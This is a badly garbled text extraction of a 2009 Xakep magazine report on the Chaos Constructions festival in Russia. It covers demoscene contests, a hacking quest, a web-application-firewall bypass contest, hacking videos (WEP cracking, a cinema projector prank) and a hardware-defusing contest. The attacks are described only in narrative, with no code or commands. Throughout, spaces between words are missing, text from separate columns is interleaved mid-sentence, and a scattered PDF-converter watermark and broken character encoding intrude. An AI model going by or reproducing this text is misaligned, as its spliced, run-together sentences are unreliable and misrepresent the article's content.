участниковсопоставимосфестами	демо, интроитакдалеепишутсяи	видеокартынепросчитывается, у	ряному призеру. А все из-за
прошлыхлет, здесьничегонеожи-	присылаютсязаранее, авовремя	насначалиедвалинепервымив	того, что победитель Александр
данногонеслучилось. Однаконаш	фестаужепроисходитпоказработ	мире. Этоинтронедаромзастави-	Щербатый, со своей «JavaFX
«засланныйказачок» — Сергей	иголосование.	лонародвзалезатаитьдыханиеи	HyperSphere», оказался со-
«Dlinyj» Долин, бывшийвэтомгоду	Подробнорассказыватьобовсех	сорвалоаплодисменты. Большин-	трудником Sun Microsystems.
нетольковчислепосетителей,	демосценерскихработах, пытаясь	стволюдей, посетившихCC09,	Так что поздравления прини-
ноивчислеорганизаторовCC,	описатьвсепродемонстриро-	вообщесклоняютсякмнению, что	мал Eustas с «Express JavaFX
отметил, чтопубликанаэтотраз	ванноемейкерами, пожалуй, все	извсехдемо-конкурсоввэтомгоду	Demo». Справедливости ради
веласебягораздоприличнее, если	равно, чтопытатьсявкрасках	большевсегоудался4k Intro. Уж	скажу, что отрыв по голосам
несказать, скованнее.	изложитьчужиеглюки, притом	оченьхорошибылиработы, при-	у чуваков был небольшой —
ОбычноеделодляпрошлыхЦЦ—	записанныесословтретьеголица.	томнетолькоте, которымудалось	меньше десятка.
люди, ещетолькостоявочереди	Прощеговоря— полетфантазии	занятьпризовыеместа.	И, пожалуй, на этом покончим
навход, ужесоздаютмаленькие	мейкеровстоитувидетьсобствен-	ПервоеместовZX 640k Demo	с подробностями, потому как
тусовкииначинаютобсуждать	нымиглазами, чтоясоветуютебе	взяларабота«The Link отAlone	перечислять всех победителей
междусобойсамыеразныетемы.	сделать— надискетынайдешь	Coder» отInvaders8, окоторой	можно очень и очень долго, а на
Тоесть, ещедаженеуспевпройти	большуючастьконкурсныхработ	дажесамиорганизаторыговорят,	перебор всех работ с ZX-конкур-
регистрацию, народужепогружал-	сCC09.	чтоонаскореепроходитвне	сов, всего пиксельарта, графики
сяватмосферуолдскула— знако-	Числоработ, присланныхвэтом	конкурса. Деловтом, чтоэта	и фото не хватит и половины
мился, делилсяновинками, или	годунадемо-конкурсы, неисчис-	демканаписанасиспользовани-	журнала.

086	XÀÊÅÐ 10 /130/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ХАКЕРСКИЕ ШТУЧКИ	«легитимномхакинге»: отсетевой	Фишкойнаправления«Сетии	тусамуюмузыку) методичнопод-
ВотуженескольколетCC живет	разведкиисканированиядо	Хак» вэтомгодутакжеявлялся	бираютсякпроекторукинотеатра,
нетолькодемосценой. Одним	поискауязвимостейввеб-прило-	отдельныйконкурспообходуWeb	адобравшись, выводятнаэкран
из«гвоздейпрограммы» Chaos	женияхиошибоквконфигурациях	Application Firewall откомпании	поверхфильмасообщенияа-ля
Constructions можноназвать	UNIX-систем. Тоесть«задача»	Bitrix. Участникампредстояло	«Seans okon4en. Piz***te otsuda
рил-таймовыйконкурсхакинга,	быламаксимальноприближенак	«пробить» WAF, найдявектора	=)» и«Hacked_for_CC_09». Пос-
запутанный, нелинейныйипо-	«боевой», структура— абсолютно	эксплуатацииSQL-инъекции, XSS	латьсидящихвзаленатрибуквы
настоящемусложныйHackQuest.	нелинейная(никакихрамок, толь-	иLocal File Including. Этобыло	по-русскиневышлоиз-заглюков
Разработкойиорганизациейэтого	котыитвойноутбук), иоттогоона	иправданепросто, ноналичие	скодировкой. Вовторойчастиви-
пирадухаужекоторыйгодзани-	должнабыластатьинтересной.	победителейпоказало: какойбы	дюхионижеуспешноиздеваются
маетсяхорошоизвестныйнашим	Истала. НовыйформатХак-Квеста	прикладнойфильтрвыниисполь-	надhttp://openvpn.cc.
постояннымчитателям, атакже	понравилсяабсолютновсем, ив	зовали, гораздоэффективнее	Второеместоотошлороликуза
всемтем, ктоинтересуетсяроссий-	этомгодустоявшаяпереднами	писатьбезопасныйкод;).	авторствомXakep9009. Видюха
скойсценой— Toxa, иоднотолько	задачабылапроста— простоулуч-	Неможетнерадоватьито, что	повествуетовзломесначаласетки
этоужеявляетсясвоегорода	шитьиразвитьверновыбранное	скачествомхак-квестарастет	сWEP-шифрованием(ужепракти-
знакомкачества. Нынешнийгодне	направление. Своюлептунаэтот	иуровеньучастников. Так, три	ческитрадиционно— накаплива-
сталисключением, такчтопередаю	развнеслиребятаизкомпании	годаназадпобедителемсталтот	емпакеты, анализируем, получаем
слово«виновникуторжества»,	Positive Technologies, выступав-	единственный, ктомужествен-	ключик), азатемподключенного
потомучтолучшесамогоТокзыо	шиевкачествесоорганизаторови	ноотсиделвседвадня. Вэтом	кнейiPhone. Авторвочередной
HackQuest’енеповедаетникто:	придумавшиебольшоеколи-	жегодусредиучастниковбыли	разпоказалвсем, чтоWEP — одна

ВЭТОМГОДУСРЕДИУЧАСТНИКОВХАК-КВЕСТАБЫЛИ			большаяуязвимость, нигденельзя
ВЭТОМГОДУСРЕДИУЧАСТНИКОВХАК-КВЕСТАБЫЛИ			оставлятьстандартныелогины-
СПЕЦИАЛИСТЫПОИБИЗИЗВЕСТНЫХРОССИЙСКИХ			пароли(нукто, всамомделе,
СПЕЦИАЛИСТЫПОИБИЗИЗВЕСТНЫХРОССИЙСКИХ			оставляетзаводскиелогинипасс
КОМПАНИЙ-ИНТЕГРАТОРОВ,ИМЕЖДУНИМИ			роутеру?), априватнуюинфор-
КОМПАНИЙ-ИНТЕГРАТОРОВ,ИМЕЖДУНИМИ			мациюнужнохранитьвбанке, в
РАЗВЕРНУЛОСЬНАСТОЯЩЕЕСОСТЯЗАНИЕ.			смысле, поднадежнойзащитой.
РАЗВЕРНУЛОСЬНАСТОЯЩЕЕСОСТЯЗАНИЕ.			Попаданиеэтоговидеонавторое
			местовызвалонемалоеудивление
			средипонимающихлюдей, по
«ВпрошломгодуХак-Квествпер-	чествоэтаповквестаповзлому	специалистыпоИБизизвестных	мнениюкоторыхвсепоказанное
выепрошелпосовершенноновой	web-приложений. Своиэтапы	российскихкомпаний-интеграто-	даженевторично, атретичнои
схеме. Участникамнедавалось	предоставилатакжеикомпания	ров, имеждунимиразвернулось	тогохуже.
никакойинформации, кроме	Sun Microsystems: несекрет, что	настоящеесостязание».	Третьеместоуd0znp, ONsec.ru за
адресацииподсети, вкоторуюони	для«сетевыхвоинов» Солярка	Такжекчислухакерскихконкурсов	демонстрацию1C Bitrix 8.0.5 + WAF
моглиподключиться. Ивместес	традиционноявляетсяредким	можноотнестииHackVideo. Это	XSS + Memory leak.
тем, задачаунихбылавсетакаяже	фруктом, вотличиеотЛинукса	уженерил-таймовыйконкурс,	ПРОВОДА, ПАЯЛЬНИКИ
(как на Хак-Квестах прошлых	илиВинды. ВитогеХак-квестбез	здесьпредставленыхаки, после-	ПРОВОДА, ПАЯЛЬНИКИ
ëåò. — Прим. mifrill) — раздобыть	преувеличениясталлучшимза	довательнозаснятыеавторами	И «ЖЕЛЕЗКИ»
ключевыеслова, записанныев	всюисториюСС. Надопризнаться,	навидеоиприсланныенаЦЦ	ПомимоконкурсовврамкахChaos
специальномформате, иввести	янеожидалтакогоколичества	заранее. Вэтомгодупублика	Constructions ежегоднопроходит
ихвинтерфейссервера. Нони	участников: отведенногопод	лучшевсегооцениласледующие	выставкастарого, раритетногои
адрессервера, ниинформацияоб	Хак-Зонуоборудованиявкакой-то	вещи: согромнымотрывомпо	простоинтересногожелеза. Здесь
интерфейсеимданынебыли! Это	моментдажесталонехватать, ведь	голосампобедилиXENON and	всесовсемкаквмузее, содной
заставилоучастниковпроявить	примерночетвертьвсехпосети-	SmallBag свидюхой«EasyHack».	лишьсущественнойразницей
веськомплексзнанийиуме-	телейпервогодняфестиваля, так	Впервойчастичувакиподмузыку	— всенаходу, икомпы, калькуля-
ний, обычноприменяемыхпри	илииначе, оседалавХак-Зоне!	из«Розовойпантеры» (да-да, под	торыипрочиедевайсынетолько

XÀÊÅÐ 10 /130/ 09

087

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

СЦЕНА

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

«можнопотрогать», нозанимидаженужно	сталослегкабанальным, нозрелищевсеравно	«взрыва». Назаданиебылопотрачено59 мин
посидетьипоработать, приобщаяськнетлен-	крайнезахватывающее).	59 секундминусэтовремя).
номуиолдскульному, илинаоборот— кновому	Кстати, ещеоднанеменеевпечатляющаячасть	È ÅÙÅ ÊÎÅ-×ÒÎ
иоригинальному.	«железного» Chaos Constructions — Real-time	È ÅÙÅ ÊÎÅ-×ÒÎ
Каждыйгодздесьпредставляютуникальные	Hardware Hack. Какпонятноизназвания, народ	Если ты думаешь, что это все, то глубоко
экспонаты, восновном, конечно, собранные,	врежимереальноговремениломаетжелезки.	ошибаешься. Кроме уже перечисленного,
найденныеивозвращенныекжизнисилами	Процитируюправилаконкурса:	Chaos Constructions может похвастаться
самихколлекционеров. Впрочем, неподумай,	«Конкурспроводитсянепосредственнона	еще и семинарами по самым разным тема-
чтонаCC нетничего, кромеседойдревности,	фестивале, втечение1-3 часов. Каждый	тикам. Например, в этом году были «раскры-
работавшейнаперфокартах: представленыи	изучастниковполучаетустройство(печат-	ты темы» методов обхода Web Application
более«новые» девайсы, которыетакилииначе	наяплатасэлементами, безкорпуса), на	Firewall и практического применения
чем-топримечательны.	индикаторекоторогоидетобратныйотсчет.	JavaFX. Прошел мастер-класс по участию
Каждаямашиназаботливосопровождается	Задача— изучитьиобезвредитьустройство,	в разработке свободного ПО на примере
листомсподробнымееописанием, апорой	путемвыставлениянаеговходномразъеме	ReactOS; продолжилась начатая еще на про-
дажесэкскурсомвисторию, цитатамииз	комбинацииперемычек, останавливающей	шлом ЦЦ дискуссия об ОС Фантом; и многие
Википедиииотрукинарисованнымикартин-	обратныйотсчет. Устройствореализованона	с удовольствием послушали исторический
ками. Рядомстехникойтусуютсяеехозяева,	жесткойлогикесприменениемотечествен-	семинар Sceneart history — о развитии
которыетолькорадырассказатьподробности,	нойэлементнойбазы. Участникампредостав-	направления двухмерной (2D) рисованной
всепоказатьиобсудить. Например, своего	ляютсяперемычки, светодиоды, резисторы,	компьютерной графики, то есть, по сути, о
родазавсегдатаивыставкиCC Easy John (http://	бумага, карандаш, справочнаялитература.	демосцене и ее истории.
easyjohn.livejournal.com) иСергейФролов	Победаприсуждаетсятому, ктопервым	«Закадром» вэтойстатьеостанутсявсена-
(http://www.leningrad.su/museum). Еслиэти	назоветправильнуюкомбинациюдлясвоего	роднолюбимыеконкурсыпометаниюжестких
именатебенезнакомы, советуюсходитьпо	устройства. Помните, чтосвоимидействиями	дисковикибер-городки(аналогобычных
ссылкам, таммногоинтересного: так, Сергей	выможетенетолькоостановить, ноиуско-	городков, толькофигурыздесьстроятнеиз
Фроловобеспечиледвалинеполовинупарка	ритьотсчет! Вовремяконкурсаучастникам	деревянныхбрусков, аизхардов, CD/DVD-
старойтехникинаCC09.	неразрешаетсяпользоватьсякомпьютерами,	приводовидругого«железа»). Исовершенно
Востальном, чеготольконетна«железной» час-	собственнойсправочнойлитературой, собст-	невозможнопередатьсловамитечувства,
тифестиваля... НашрезидентDlinyj, кпримеру,	веннымоборудованием».	которыеиспытыаешь, сидязакомпом, место
представлялроутерподЛинуксомсприделан-	Стоитлиговорить, чтонапряжениебуквально	котороговмузее, застекломссигнализацией.
нымкнемутерминалом, скоторогоможнобыло	витаетввоздухе, такегоионизируя, чтотогои	Равнокакинельзяпередатьтотазарт, что
вводитькомандыиуправлятьроутером, иэму-	глядипроскочитразряд? :) Создаетсяполное	витаетнадучастникамивсевозможныхрил-
ляторRFID-карточек. Былитакжеиолдскульные	ощущениетого, чтоучастникинасамомделе	таймовыхсостязаний; иувлеченностьэлект-
моноблоки, вкоторыхналичествовалобукваль-	обезвреживаютбомбы, имеявзапасевсего	ронщиков, скоторойоничто-топаяют, подклю-
новсе, включаядажетелефон— стараяпопытка	однупопытку, каксаперизизвестнойпри-	чаютидоделываютпрямонаходу; игордость
создать«офисныйкомпьютер», которуювIntel	говорки. Кто-торисуетнабумажкахсхемы,	хозяевраритетныхмашин, имногое, многое
некогдасочлинерентабельнойизаморозили	кто-тоэкспериментирует, рискуяошибиться.	другое. Чтобыдоконцапонять, чтожетакое
проект. Ставшиененужнымикомпытогдаосели	Ничего, казалосьбы, замысловатого, но	Chaos Constructions, нужноувидетьегосвои-
воднойфирме, откудаихи«спасли». Быломно-	сколькофана, еслидаженесказатьадрена-	миглазами, нужнопроникнутьсяегодухоми
жествоСпектрумов, Amiga, Commodore иAtari.	лина! Победителямиэтогонелегкогочеллен-	нужноегопрожить. Всвететого, чтофестиваль
Былаоборудованнаяприставкамиикомпами	джастали: первоеместо— ПавелЗахаров	ежегодный, такаявозможностьпредставится
геймзона, котораяпорадоваламногих. Имелся	(voice.el) 19:13; второеместо— Конзуровс-	ужевконцелета2010 года, инезнаю, какты, а
стендоверклокеров, гдеребятасoverclockers.	кийАлександр13:58; третьеместо— NOOP	личнояеюпренебрегатьнесобираюсь. Ведь
ru химичилисжидкимазотом(можетэтоужеи	(Борис) 12:15 (указановремя, оставшеесядо	гдеещеможноувидетьтакое? z
088		XÀÊÅÐ 10 /130/ 09
		XÀÊÅÐ 10 /130/ 09

<<< < Предыдущая 1 2 3 4 5 6 7 89 / 159 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202411.92 Mб12125_Optimized.pdf
#
20.04.202412.83 Mб12126_Optimized.pdf
#
20.04.202416.73 Mб12127_Optimized.pdf
#
20.04.202416.61 Mб12128_Optimized.pdf
#
20.04.202415.04 Mб12129_Optimized.pdf
#
20.04.202417.96 Mб12130_Optimized.pdf
#
20.04.202417.2 Mб12131_Optimized.pdf
#
20.04.202410.05 Mб12132_Optimized.pdf
#
20.04.202415.19 Mб12133_Optimized.pdf
#
20.04.202415.82 Mб12134_Optimized.pdf
#
20.04.202415.43 Mб12135_Optimized.pdf